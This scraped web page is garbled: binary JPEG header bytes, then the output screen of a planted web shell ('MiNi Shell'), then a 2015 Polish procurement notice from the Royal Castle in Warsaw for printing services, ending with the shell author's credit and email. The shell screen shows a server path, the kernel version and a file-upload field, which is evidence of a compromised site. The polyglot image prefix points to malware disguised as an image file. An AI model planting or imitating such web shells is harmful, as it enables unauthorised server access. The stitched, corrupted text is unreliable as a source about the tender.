JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150306/49956-N-2015.html

<p class="kh_header"><b>Warszawa: Usługi poligraficzne</b><br>
<b>Numer ogłoszenia: 49956 - 2015; data zamieszczenia: 06.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zamek Królewski w Warszawie -Muzeum. Rezydencja Królów i Rzeczypospolitej , Plac  Zamkowy 4, 00-277 Warszawa, woj. mazowieckie, tel. 22 35 55 432, faks 22 35 55 219.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamek-krolewski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi poligraficzne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi poligraficzne w zakresie druku i przygotowalni w drukarni - od etapu wykonania form drukowych po druk dla pozycji od 1 do 13 i od 16 do 20 oraz od etapu wykonania matryc elektronicznych (według powierzonego projektu), form drukowych po druk dla pozycji 14 i 15. 
1.Raport Roczny 2014 r.
nakład 600 egz. 

2.Informator zamkowy, dot. ekspozycji na I piętrze - obowiązujący od 1 maja 2015 r. 
do 30 września 2015 r., wersja polsko-angielska
nakład 35.000 sztuk

3.Informator zamkowy, dot. ekspozycji na I piętrze - obowiązujący od 1 października 2015r. do 30 kwietnia 2016 r., wersja polsko-angielska
nakład 25.000 sztuk

4.Informator Zamkowy  - ekspozycja w pałacu Pod Blachą, Apartament Księcia Józefa, 
wersja polsko-angielska
nakład 10 000 sztuk

5.Informator Zamkowy  - ekspozycja w pałacu Pod Blachą
Kobierce z Fundacji Teresy Sahakian, wersja polsko-angielska
nakład 5 000 sztuk

6.Informator Zamkowy - ekspozycja w piwnicach Zamek Królewski - Zniszczenie
i odbudowa, wersja polsko-angielska
nakład 10 000 sztuk

7. Informator Zamkowy - ekspozycja Galeria Lanckorońskich oraz Galeria Malarstwa, Rzeźb i Sztuki Zdobniczej, wersja polsko-angielska
nakład: 10 000 tys. sztuk

8. Informator dodatkowy, tyko w wersji angielskiej 
nakład 10 000 sztuk

9. Informator dodatkowy, tyko w wersji francuskiej 
nakład 5 000 sztuk

10. Informator dodatkowy, tyko w wersji rosyjskiej 
nakład 5 000 sztuk

11. Informator dodatkowy, tyko w wersji włoskiej 
nakład 5 000 sztuk

12. Informatory o lekcjach muzealnych 2015/2016 dla szkół podstawowych, ponadpodsta-wowych (gimnazjów i liceów), oferty edukacyjnej Pracowni Działań Muzealnych
w nakładach odpowiednio 1700, 1200,1300  - łączny nakład: 4200 egz. - 3 projekty

13. bilety wstępu 
nakład: 200.000 szt., 

14. program koncertowy
nakład: 5 programów po 250 egz. (5 składów)  
nakład w sumie: 1250 szt.,

15.  afisz koncertowy
nakład 4  afiszy x 120 sztuk = 480 szt. (4 x skład)

16. Katalog wystawy  Order Świętego Stanisława (1765-1831). W 250. rocznicę powołania Orderu. Praemiando Incitat
nakład: 750 egz.

17. Zaproszenie na otwarcie wystawy
nakład: 800 egz.

18. Zaproszenie do zwiedzenia wystawy
nakład: 800 egz.

19. Plakat
nakład: 100 egz.

20. Folder 
nakład: 2000 sztuk.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie warunku oceniane będzie zgodnie z formułą spełnia/nie spełnia na podstawie złożonego oświadczenia i dokumentów, o których mowa w SIWZ cz. II pkt 3, tj. oświadczenia o spełnianiu warunków udziału w postępowaniu, wykazu wykonanych usług, dowodów czy zostały wykonane należycie oraz egzemplarzy wykonanych publikacji. 
Ze złożonych dokumentów powinno wynikać, że Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej po dwie z niżej wymienionych usług polegających na druku:
a)	plakatów  
b)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem bigowania* 
c)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem falcowania* 
d)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem folii matowej położonej jednostronnie*
e)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem folii błyszczącej położonej jednostronnie*
f)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem lakieru UV położonego punktowo*
* bigowanie, falcowanie, foliowanie jednostronne i punktowo położony lakier UV, może występować łącznie w co najmniej dwóch usługach
g)	publikacji o oprawie miękkiej i klejonej 
h)	 publikacji w oprawie twardej szytej nićmi i klejonej z okładką tekturową z oklejką</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować drukarnią usytuowaną w odległości nie większej niż 60 km od siedziby Zamawiającego (jest to uwarunkowane względami organizacyjnymi Zamawiającego).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnianie warunku w tym zakresie będzie oceniane łącznie.

Spełnianie warunku oceniane będzie zgodnie z formułą spełnia/nie spełnia na podstawie złożonych oświadczeń, tj. złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu. oraz oświadczenia, że Wykonawca dysponuje drukarnią znajdującą się w odległości do 60 km od siedziby Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie warunku oceniane będzie zgodnie z formułą spełnia/nie spełnia na podstawie złożonego oświadczenia i informacji, o których mowa w SIWZ cz. II pkt 3 lit. c), tj. oświadczenia o spełnianiu warunków udziału w postępowaniu oraz wykazu osób zdolnych do wykonania zamówienia, które będą uczestniczyć 
w wykonaniu zamówienia.

Ze złożonych dokumentów powinno wynikać, że Wykonawca dysponuje co najmniej jedną osobą posiadającą co najmniej 2-letnie doświadczenie w druku 
i co najmniej jedną osobę posiadającą co najmniej 2-letnie doświadczenie w oprawie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Z wykazu usług powinno wynikać, że Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej po dwie z niżej wymienionych usług polegających na druku:
a)	plakatów  
b)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem bigowania* 
c)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem falcowania* 
d)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem folii matowej położonej jednostronnie*
e)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem folii błyszczącej położonej jednostronnie*
f)	krótkich folderów informacyjnych, promocyjnych lub reklamowych lub zaproszeń z zastosowaniem lakieru UV położonego punktowo*
* bigowanie, falcowanie, foliowanie jednostronne i punktowo położony lakier UV, może występować łącznie w co najmniej dwóch usługach
g)	publikacji o oprawie miękkiej i klejonej 
h)	 publikacji w oprawie twardej szytej nićmi i klejonej z okładką tekturową z oklejką;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każdy z Wykonawców dołączy do oferty po jednym egzemplarzu wykazanych 
w załączniku nr 7 wykonanych prac:
plakat - B1 lub B2,
bigowanie - druk lub okładka książki ze skrzydełkiem,
falcowania- druk ulotny,
folia matowa - druk lub okładka książki,
folia błyszcząca - druk lub okładka książki,
lakier UV - druk lub okładka książki,
publikacji w oprawie miękkiej, klejonej, 
publikacji w oprawie twardej szytej nićmi i klejonej z okładką tekturową z oklejką. 
Uwaga: Bigowanie, folia matowa (lub folia błyszcząca) i lakier UV mogą być wykazane na jednym przykładowym egzemplarzu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - Termin płatności - 0.1</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamek-krolewski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Plac Zamkowy nr 4,
00-277 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2015 godzina 10:00, miejsce: Zamek Królewski w Warszawie - Muzeum,
Plac Zamkowy 4, 00 - 277 Warszawa, 
Kancelaria Główna - wejście z Bramy Senatorskiej.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com